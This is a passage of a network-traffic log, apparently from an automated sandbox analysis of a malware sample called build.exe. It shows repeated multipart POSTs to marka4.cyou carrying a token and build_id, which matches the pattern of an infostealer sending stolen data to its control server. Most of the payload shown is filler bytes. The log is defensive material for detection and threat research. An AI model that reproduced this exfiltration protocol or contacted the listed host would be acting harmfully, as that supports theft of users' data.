2025-01-11 22:00:22 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 68 64 6a 35 66 63 32 6e 67 76 61 61 61 69 6d 79 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 70 68 64 6a 35 66 63 32 6e 67 76 61 61 61 69 6d 79 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 70 68 64 6a 35 66 63 32 6e 67 76 61 61 61 69 6d 79 35 78 6c 0d 0a 43 6f 6e 74 Data Ascii: ------phdj5fc2ngvaaaimy5xlContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------phdj5fc2ngvaaaimy5xlContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------phdj5fc2ngvaaaimy5xlCont
2025-01-11 22:00:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:22 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:22 UTC	581	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:23 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49774	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:23 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----l6xtrq1vs0zm7q9hd26x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 153381 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6c 36 78 74 72 71 31 76 73 30 7a 6d 37 71 39 68 64 32 36 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 78 74 72 71 31 76 73 30 7a 6d 37 71 39 68 64 32 36 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 78 74 72 71 31 76 73 30 7a 6d 37 71 39 68 64 32 36 78 0d 0a 43 6f 6e 74 Data Ascii: ------l6xtrq1vs0zm7q9hd26xContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------l6xtrq1vs0zm7q9hd26xContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------l6xtrq1vs0zm7q9hd26xCont
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:23 UTC	6186	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49775	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:24 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----26fuaa16xlnymycbsjw4 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 36 66 75 61 61 31 36 78 6c 6e 79 6d 79 63 62 73 6a 77 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 32 36 66 75 61 61 31 36 78 6c 6e 79 6d 79 63 62 73 6a 77 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 32 36 66 75 61 61 31 36 78 6c 6e 79 6d 79 63 62 73 6a 77 34 0d 0a 43 6f 6e 74 Data Ascii: ------26fuaa16xlnymycbsjw4Content-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------26fuaa16xlnymycbsjw4Content-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------26fuaa16xlnymycbsjw4Cont
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-11 22:00:24 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 